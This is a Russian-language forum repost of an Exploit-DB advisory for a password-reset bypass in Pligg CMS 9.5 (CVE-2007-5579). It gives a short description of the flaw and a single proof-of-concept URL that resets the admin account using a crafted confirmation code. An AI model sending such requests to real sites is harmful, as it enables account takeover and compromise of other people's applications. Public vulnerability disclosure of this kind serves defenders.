Exploit Pligg CMS 9.5 - Reset Forgotten Password Security Bypass

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
30088
Проверка EDB
  1. Пройдено
Автор
242TH SECTION
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2007-5579
Дата публикации
2007-05-25
Код:
source: https://www.securityfocus.com/bid/24158/info

Pligg is prone to a security-bypass vulnerability due to a design error when resetting forgotten passwords.

An attacker may exploit this issue to reset account passwords for arbitrary users and then compromise a vulnerable application. This can also aid the attacker in further attacks.

Pligg 9.5 is reported vulnerable; other versions may also be affected. 

http://www.example.com/login.php?processlogin=4&username=admin&confirmationcode=1234567891e2f566cbda0a9c855240bf21b8bae030404cad7
 
Источник
www.exploit-db.com

Похожие темы